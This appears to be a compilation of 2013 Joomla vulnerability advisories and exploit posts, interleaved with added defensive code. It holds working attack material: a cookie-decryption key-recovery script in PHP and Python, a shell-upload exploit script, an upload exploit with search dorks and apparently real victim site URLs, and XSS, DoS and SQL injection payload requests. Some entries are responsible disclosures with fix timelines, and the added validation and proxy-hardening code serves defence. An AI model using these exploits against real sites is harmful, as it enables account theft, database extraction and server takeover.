So if an attacker knows the plaintext corresponding to one block of ciphertext, he is able to calculate the key and thus to decrypt the complete ciphertext. Because the same key is reused for every block, the known plaintext need not even be the first block: any known bytes reveal the key bytes at the same offsets modulo the key length, and known bytes that cover every offset at least once reveal the whole key.

# An example in the Joomla core

In the Joomla core, JCryptCipherSimple is used for the "remember me" function. There the serialized user credentials are encrypted with JCryptCipherSimple. The serialized credentials look for example like this:

a:2:{s:8:"username";s:12:"the_username";s:8:"password";s:12:"the_password";}

The key used is 32 characters long. The first block to encrypt is thus:

a:2:{s:8:"username";s:12:"the_us

So the attacker only needs to know the beginning of the victim's username to calculate the key and decrypt the second and third blocks (including the victim's password).

# Exploit the core vulnerability

To exploit the vulnerability it is necessary to steal the "remember me" cookie of a user, for example through an XSS vulnerability. Then the key can be calculated with the script below. The script is written for the Joomla Platform 12.3; the functions used are identical to those in the current versions of the CMS. To calculate the key, set the variables $plaintext (known part of the credentials) and $ciphertext (content of the remember me cookie) and execute the script. It may also be necessary to adjust the path to the library files. The script works because decrypt() is itself only an XOR: feeding the known plaintext in as the "key" yields Ciphertext XOR Plaintext, whose first 32 bytes are the real key.

# The exploit script

<?php
require '../libraries/import.php';
require_once '../libraries/legacy/application/application.php';

class CalculateKey extends JApplicationCli
{
    public function execute()
    {
        $plaintext  = ''; // first part of serialized credentials (at least 32 characters)
        $ciphertext = ''; // content of remember me cookie

        // decrypt() XORs the input with the "key"; using the plaintext as the key
        // returns Ciphertext XOR Plaintext, i.e. the real key
        $key   = new JCryptKey('simple', $plaintext, $plaintext);
        $crypt = new JCrypt(new JCryptCipherSimple, $key);
        $out   = $crypt->decrypt($ciphertext);
        $out   = substr($out, 0, 32);
        $this->out($out);
    }
}

JApplicationCli::getInstance('CalculateKey')->execute();

# What else?

JCryptCipherSimple may also be used by third-party developers in their Joomla extensions, so there is an unknown number of vulnerable extensions.

# Solution

A solution would be to rewrite JCryptCipherSimple so that its output is non-deterministic. Wrapping a repeating-key XOR in another mode of operation would not help much on its own, since the keystream itself is the secret that leaks; the better fix is to use one of the other ciphers provided by the Joomla core and remove JCryptCipherSimple.

# History

2013.05.11 Vulnerability reported to the vendor
2013.05.12 Vendor asked for details
2013.05.12 Details and exploit provided to the vendor
2013.05.30 Asked vendor about the status of investigation (no response)
2013.06.11 Sent another mail to the vendor (no response)
2013.06.15 Full disclosure
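The key recovery described above, carried through end to end in working code. This is an added example, not the advisory's script or Joomla code: it models JCryptCipherSimple as the advisory describes it (byte-wise XOR against a key repeated to the input length, with hex-encoded output); SAMPLE_KEY, the credentials and the 32-byte key length are constructed values standing in for a real site's. It also goes one step past the advisory: the known plaintext may sit at any offset, and recover_key() reports which key bytes remain unknown when fewer than 32 plaintext bytes are known.

```python
"""Key recovery against a JCryptCipherSimple-style "remember me" cookie.

Added example (not code from the advisory or from Joomla). It models the
cipher as the advisory describes it: every plaintext byte is XORed with the
key byte at the same offset modulo the key length, and the result is
hex-encoded. SAMPLE_KEY, the credentials and the 32-byte key length are
constructed sample values standing in for a real site's values.
"""
import hashlib
from itertools import cycle

KEY_LEN = 32
# Joomla derives the key from an md5 hex digest (32 ASCII chars); this one is a sample.
SAMPLE_KEY = hashlib.md5(b"sample-secret:Mozilla/5.0").hexdigest().encode()


def simple_encrypt(plaintext: bytes, key: bytes) -> str:
    """Repeating-key XOR, hex encoded (model of JCryptCipherSimple::encrypt)."""
    return bytes(p ^ k for p, k in zip(plaintext, cycle(key))).hex()


def simple_decrypt(ciphertext_hex: str, key: bytes) -> bytes:
    """XOR is its own inverse, so decryption is the same operation."""
    return bytes(c ^ k for c, k in zip(bytes.fromhex(ciphertext_hex), cycle(key)))


def serialize_credentials(username: str, password: str) -> bytes:
    """What PHP serialize() emits for array('username' => ..., 'password' => ...)."""
    return (f'a:2:{{s:8:"username";s:{len(username)}:"{username}";'
            f's:8:"password";s:{len(password)}:"{password}";}}').encode()


def recover_key(ciphertext_hex: str, known: bytes, offset: int = 0, key_len: int = KEY_LEN) -> list:
    """Key = Ciphertext XOR Plaintext, position by position.

    The known plaintext may sit anywhere in the message; offset says where.
    Returns key_len entries, None where no known byte covers that key
    position, so the caller sees exactly how much of the key was recovered.
    """
    data = bytes.fromhex(ciphertext_hex)
    key = [None] * key_len
    for i, p in enumerate(known):
        pos = offset + i
        if pos >= len(data):
            break
        slot = pos % key_len
        k = data[pos] ^ p
        if key[slot] not in (None, k):
            raise ValueError(f"known plaintext contradicts itself at key byte {slot}")
        key[slot] = k
    return key


def decrypt_partial(ciphertext_hex: str, key: list) -> bytes:
    """Decrypt with a possibly incomplete key; unknown positions come out as '?'."""
    out = bytearray()
    for i, c in enumerate(bytes.fromhex(ciphertext_hex)):
        k = key[i % len(key)]
        out.append(c ^ k if k is not None else ord("?"))
    return bytes(out)


def demo():
    """The attack as in the advisory: the cookie plus the first 32 plaintext bytes."""
    cookie = simple_encrypt(serialize_credentials("the_username", "the_password"), SAMPLE_KEY)

    # Structural prefix (26 bytes) plus the first six characters of the username.
    known = b'a:2:{s:8:"username";s:12:"the_us'
    full_key = recover_key(cookie, known)
    plaintext = decrypt_partial(cookie, full_key)

    # With only the structural prefix, six key bytes stay unknown and the
    # decrypted password has holes at those offsets in every block.
    partial_key = recover_key(cookie, known[:26])
    partial_plaintext = decrypt_partial(cookie, partial_key)
    return cookie, full_key, plaintext, partial_key, partial_plaintext


if __name__ == "__main__":
    cookie, full_key, plaintext, partial_key, partial_plaintext = demo()
    print("cookie       :", cookie)
    print("recovered key:", bytes(full_key).decode())
    print("plaintext    :", plaintext.decode())
    print("partial key  :", partial_key)
    print("partial text :", partial_plaintext.decode())
```

The partial case is the one to keep in mind when assessing exposure: an attacker who knows only the serialized structure and not the victim's username still recovers 26 of the 32 key bytes, and the six missing ones can be guessed from the password's printable-ASCII constraint or from a second cookie issued under the same key, so a "random-looking" username is no protection.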
Joomla Rokdownloads Shell Upload
#################################
# ISlamic Republic Of Iran Security Team
# Www.IrIsT.Ir
#################################
# Exploit Title : joom­la com_rokdownloads Components shell upload Vulnerability
# Author : IrIsT Security & Researcher Team
# Discovered By : Am!r
# Home : http://IrIsT.Ir - http://IrIsT.Ir/forum
# Facebook Page : http://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
# Software Link : http://www.joomla.org
# Security Risk : High
# Tested on : Linux
# Dork : inurl:administrator/components/com_rokdownloads
#################################

Exploit : Post.php

<?php
// Posts Amir.php.gif to the component's upload handler, which needs no authentication.
// The "@file" CURLOPT_POSTFIELDS syntax is deprecated since PHP 5.5 and off by default
// from 5.6 (CURLOPT_SAFE_UPLOAD); on those versions use new CURLFile($uploadfile) instead.
$uploadfile = "Amir.php.gif";
$ch = curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access :
http://www.exemple.com/images/stories/Amir.php.gif

(Whether a file named *.php.gif executes depends on the web server mapping ".php" anywhere in the name to the PHP handler, e.g. Apache AddHandler; a server that only matches the final extension will serve it as an image.)

#################################
# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0
# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous
# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv
# & All Members In IrIsT.Ir
#################################
#Tnx To : PacketstormSecurity.Org - Cxsecurity.Com - 1337day.com - exploit-db.com
#################################
Joomla Attachments Shell Upload
#######################################################################################################
# Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability
# Google Dork: inurl:"index.php?option=com_attachments"
# Date: 2013-07-09
# Exploit Author: Stars Hacking Team
# We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der
# Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com
# Vendor Homepage: http://joomla.org
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115
# Tested on: Linux
#######################################################################################################
# ~> Exploit <~
#
# http://target/index.php?option=com_attachments&task=upload
#
# 1. Upload your file.
# 2. Find your file under this path:
#    http://target/attachments/article
# 3. End :P
#
########################################################################################################
# ~> Demo <~
# http://www.iwalkforlife.com/index.php?option=com_attachments&task=upload
# http://www.iwalkforlife.com/attachments/article/0/stars.jpg
# ----
# http://www.lgbtpsychology2013.com/index.php/en/?option=com_attachments&task=upload
# http://www.sailors-club.net/index.php?option=com_attachments&task=upload
# http://www.project-establis.eu/index.php?option=com_attachments&task=upload
########################################################################################################
# Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX
# iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X
# Fuck All Lammer in Cyber :P
########################################################################################################
Joomla Googlemaps 3.2 Cross Site Scripting / Denial Of Service
Earlier I wrote about multiple vulnerabilities in the Googlemaps plugin for Joomla (http://securityvulns.ru/docs29645.html). After I informed him, the developer fixed these vulnerabilities in versions 2.19 and 3.1 of the plugin by removing the proxy functionality. In version 3.2 of the plugin he introduced new proxy functionality, which was meant to be protected against the previous attacks. But after checking, I found two holes in the latest version of the plugin. These are Denial of Service and Cross-Site Scripting vulnerabilities in the Googlemaps plugin for Joomla.

-------------------------
Affected products:
-------------------------

Vulnerable is Googlemaps plugin v3.2 for Joomla.

I've informed the developer about these holes. Now he is working on a new version.

-------------------------
Affected vendors:
-------------------------

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

----------
Details:
----------

To bypass the protection on accessing this script, it is necessary to set the referer, cookie and token. The referer is the current site, the cookie is set by the site (Joomla) itself, and the token can be found on a page of the site that uses the plugin (it is set in the URL). This data can be taken from the site automatically.

Referer: http://site
Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1

Besides conducting a DoS attack manually, it is also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html).

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
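The two issues above share one root cause: the KML proxy fetches any URL it is handed and relays the response as received. As an added example, not the plugin's own code, this is how such a proxy can bound what it fetches (host allow-list, timeouts, size cap) and how it hands the body back (fixed KML content type, no sniffing); ALLOWED_HOSTS, MAX_BYTES and the function names are this example's own.

```php
<?php
// Added example, not the plugin's code: bounding what a KML proxy such as
// plugin_googlemap3_kmlprxy.php will fetch and how it returns the result.
// ALLOWED_HOSTS, MAX_BYTES and the function names are this example's own.
const ALLOWED_HOSTS = ['maps.example.org'];   // constructed allow-list
const MAX_BYTES     = 2 * 1024 * 1024;

/** Validate the "url" parameter; return [curl options, null] or [null, reason]. */
function kmlProxyOptions(string $url): array
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return [null, 'not an absolute http(s) URL'];   // "site2/large_file" lands here
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return [null, 'scheme not allowed'];
    }
    if (!in_array(strtolower($p['host']), ALLOWED_HOSTS, true)) {
        return [null, 'host not on allow-list'];         // stops use as a DoS relay
    }
    return [[
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                 // no redirect off the allow-list
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,                    // a slow origin cannot pin a worker
        // Abort the transfer as soon as more than MAX_BYTES has arrived (non-zero return aborts).
        CURLOPT_NOPROGRESS     => false,
        CURLOPT_PROGRESSFUNCTION => function ($ch, $dlTotal, $dlNow, $ulTotal, $ulNow) {
            return ($dlNow > MAX_BYTES || $dlTotal > MAX_BYTES) ? 1 : 0;
        },
    ], null];
}

/**
 * Headers for relaying a fetched body: the remote Content-Type is never reused,
 * so a proxied xss.html is delivered as a KML attachment, not rendered as a page.
 */
function kmlResponseHeaders(string $body): ?array
{
    if (strlen($body) > MAX_BYTES || @simplexml_load_string($body) === false) {
        return null;                                    // caller answers 502 and discards the body
    }
    return [
        'Content-Type: application/vnd.google-earth.kml+xml; charset=utf-8',
        'X-Content-Type-Options: nosniff',
        'Content-Disposition: attachment; filename="proxied.kml"',
    ];
}

// Constructed inputs echoing the two advisory requests.
[$opts, $why] = kmlProxyOptions('site2/large_file');               // null, 'not an absolute http(s) URL'
[$opts, $why] = kmlProxyOptions('https://maps.example.org/a.kml'); // options array, null
```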
Joomla SectionEx 2.5.96 SQL Injection
-------------------------------------------------------------------------------------
Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities
-------------------------------------------------------------------------------------

== Description ==

- Software link: http://stackideas.com/sectionex
- Affected versions: version 2.5.96 is vulnerable. Other versions might be affected as well.
- Author: Matias Fontanini

== Vulnerabilities ==

When using the "category" view, the component does not correctly sanitize the "filter_order" and "filter_order_Dir" parameters before using them to construct SQL queries, making it vulnerable to SQL Injection attacks. In order to exploit these vulnerabilities, an attacker could perform requests like the following ones:

- For the "filter_order" parameter:

POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y

filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1 limit 1 offset 10000) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23&filter_order_Dir=DESC

- For the "filter_order_Dir" parameter:

POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y

filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC limit 1 offset 10000) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23

== Solution ==

Upgrade the product to the 2.5.104 version.

== Report timeline ==

[2013-07-30] Vulnerabilities reported to the developers.
[2013-07-30] Developers answered back indicating that a new release would be made soon.
[2013-08-01] SectionEx 2.5.104 was released, which fixed the issues reported.
[2013-08-05] Public disclosure.
Joomla 3.1.5 Cross Site Scripting
============================================================
- Original release date: August 05, 2013
- Discovered by: Emilio Pinna (Application Security Analyst at Abinsula)
- Contact: (emilio (dot) pinn (at) gmail (dot) com)
- Severity: 4.3/10 (Base CVSS Score)
============================================================

VULNERABILITY
-------------------------

Joomla core package <= 3.1.5 includes a PHP script that suffers from a reflected XSS vulnerability that allows an attacker to inject HTML and malicious scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Joomla is one of the most widely installed CMSs, with dozens of millions of installations.

DESCRIPTION
-------------------------

Affected file libraries/idna_convert/example.php has different injection points:

- Unsanitized lang parameter in line 24
- Unsanitized file name printing on lines 112 and 119

PROOF OF CONCEPT
-------------------------

http://localhost/joomla/libraries/idna_convert/example.php?lang="><script>alert(document.cookie);</script><!--

BUSINESS IMPACT
-------------------------

As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in the browser session of a user that visits the maliciously crafted URL.

SYSTEMS AFFECTED
-------------------------

Joomla-CMS <= 3.1.5

SOLUTION
-------------------------

Fixed by removing the vulnerable example file in git with commit c00c033d33d901e1ca6be9061a44e55acd041b1f

REFERENCES
-------------------------

http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/
https://github.com/joomla/joomla-cms/issues/1658

CREDITS
-------------------------

Emilio Pinna (emilio (dot) pinn (at) gmail (dot) com)

DISCLOSURE TIMELINE
-------------------------

August 4, 2013: Opened a ticket describing the bug by Adam Willard.
August 5, 2013: Fixed by Michael Babker.
August 5, 2013: Vulnerability disclosed by Emilio Pinna.

LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Joomla redSHOP 1.2 SQL Injection
--------------------------------------------
Joomla! redSHOP component v1.2 SQL Injection
--------------------------------------------

== Description ==

- Product: Joomla! redSHOP component
- Product link: http://redcomponent.com/redcomponent/redshop
- Vendor: redcomponent
- Affected versions: version 1.2 is vulnerable. Other versions might be affected as well.
- Vulnerability discovered by: Matias Fontanini

== Vulnerability ==

When using the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks. The following proof of concept request retrieves the database user, name and version:

http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422

== Solution ==

Upgrade the product to the 1.3 version.

== Report timeline ==

[2013-08-02] Vulnerability reported to vendor.
[2013-08-02] Developers answered back indicating that an update would be released soon.
[2013-08-06] redSHOP 1.3 was released, which fixes the reported issue.
[2013-08-08] Public disclosure.
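The SectionEx and redSHOP advisories above are the same defect in two shapes: a request value (an ORDER BY column and direction in one, a product id interpolated inside quotes in the other) reaching the query as text. As an added example, not code from either component, here is the validation that closes both, with the advisories' own payloads as rejected inputs; the column list, table name, helper names and the use of PDO rather than Joomla's database layer are this example's assumptions.

```php
<?php
// Added example, not from SectionEx or redSHOP: validating the three request
// parameters named in the two advisories before any of them reaches SQL.
// SORTABLE_COLUMNS, the table/column names and the helpers are this example's own.
const SORTABLE_COLUMNS = ['a.title', 'a.created', 'a.hits'];   // assumed column list

/** redSHOP's "pid" for addtocompare must be a positive integer id, nothing else. */
function productId(string $raw): ?int
{
    // '24" and 1=0 union select ...' fails the pattern; "24" passes.
    return preg_match('/^[1-9][0-9]*$/', $raw) ? (int) $raw : null;
}

/** SectionEx's filter_order / filter_order_Dir: only known values are allowed. */
function orderClause(string $order, string $dir): ?string
{
    if (!in_array($order, SORTABLE_COLUMNS, true)) {
        return null;                          // "1 limit 1 offset 10000) union ..." is rejected
    }
    $dir = strtoupper($dir);
    if ($dir !== 'ASC' && $dir !== 'DESC') {
        return null;                          // "DESC limit 1 offset ..." is rejected
    }
    return 'ORDER BY ' . $order . ' ' . $dir; // built only from allow-listed tokens
}

/** The id travels as a bound integer, never as part of the SQL text. */
function compareQuery(PDO $db, string $rawPid): ?PDOStatement
{
    $pid = productId($rawPid);
    if ($pid === null) {
        return null;                          // caller answers 400
    }
    $st = $db->prepare('SELECT product_id, product_name FROM products WHERE product_id = :pid');
    $st->bindValue(':pid', $pid, PDO::PARAM_INT);
    return $st;
}

// Constructed inputs: the payloads from the two advisories and legitimate values.
var_dump(productId('24" and 1=0 union select 1,2,3'));   // NULL
var_dump(productId('24'));                               // int(24)
var_dump(orderClause('1 limit 1 offset 10000) union all (select 1,2,3,user(),5 from dual)#', 'DESC')); // NULL
var_dump(orderClause('a.title', 'DESC limit 1 offset 10000) union all (select 1 from dual)#'));          // NULL
var_dump(orderClause('a.title', 'desc'));                // string "ORDER BY a.title DESC"
```

Joomla's request helpers (getInt for the id, getCmd plus an allow-list for the ordering) give the same result inside a component; the point is that the query string never carries client-controlled text.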